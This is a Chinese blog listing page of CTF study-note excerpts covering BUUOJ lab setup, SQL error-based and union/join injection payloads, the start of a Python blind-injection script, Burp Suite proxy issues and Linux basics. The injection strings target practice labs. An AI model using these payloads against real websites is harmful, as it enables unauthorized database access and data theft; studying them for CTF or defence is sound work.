- 博客(10)
- 收藏
- 关注
RSS订阅原创 buu内网靶机部署
basic题目下发实例只需要xshell(不用frp)ssh (端口22)用户名:root 密码:123456连接主机node3.buuoj.cn端口下发的实例端口27058(随机)ifconfig查内网ip174.1.64.147/var/www/html 默认开了apache
2020-05-12 20:02:21
1439
原创 sql报错注入函数
#1.floor()#数据尾部多一个1#?id=1'and (select count(*) from information_schema.tables group by concat(database(),floor(rand(0)*2)))--+#?id=1' union select 1,2,count(*) from information_schema.tables group ...
2020-04-24 23:32:05
247
原创 sql盲注py脚本
import requests#url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='#url = "http://localhost/sqli-labs-master/Less-1/?id=1'"url = "http://challenge-8001a3f6b43953f3.sandb...
2020-04-24 23:30:42
465
原创 linux虚拟机net连接网络
https://blog.csdn.net/qq_40637292/article/details/80861517suddenly disconnectedcat /etc/init.d/networkingvim /etc/init.d/networking(a,改完esc,:wq)/etc/init.d/networking restart
2020-04-14 01:07:46
189
原创 使用burp碰到的坑
最初设置的代理是127.0.0.1:8080,burp suite上的监听代理也是127.0.0.1:8080,浏览器和burp连接不上,不能抓包。以为是证书的问题,不能用http://burp,从burp里下证书安装了还是不行,burp suite工具无任何反应,而且burp suite下的Proxy Listener无法勾选。网上的方法说可能是端口冲突,因此尝试更换端口为9527。可以...
2020-04-11 03:48:54
1850
1
原创 sql注入姿势
001利用join进行无列名注入获取第一列的列名?id=-1' union all select * from (select * from users as a join users b)c--+获取次列及后续列名(using(a,b)查a,b下一个字段?id=-1' union all select * from (select * from users as a join users...
2020-03-27 20:03:25
218
原创 python 基础学习
import hellohello.hello(“sakura”)print("ya~hello~" + name)print('1234,{}'.format(name))print(f'1234,{name}')#error:print("1234,{name}")#error:print("1234,{}").format(name)from datetime import d...
2020-03-27 20:02:40
109
原创 linux基础
压缩解压unzip [选项] 压缩包名-d:指定解压缩位置unzip -d /tmp/ test.ziptar命令 解包:tar -zxvf FileName.tar 解包:tar -xvf 1.tar 打包:tar -czvf FileName.tar DirNamegz命令 解压1:gunzip FileName.gz 解压2:gzip -d FileName.g...
2020-03-27 20:02:23
73
原创 文件协议
file 本地文件传输协议file协议主要用于访问本地计算机中的文件,好比通过Windows的资源管理器中打开文件或者通过右键单击‘打开’一样。无hostfile:///C:/Users/pop/AppData/Local/Temp/setu.jpg有hostfile://suctf.c{}/C:/Users/pop/AppData/Local/Temp/setu.jpgURI的结构为...
2020-03-27 19:58:01
500
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人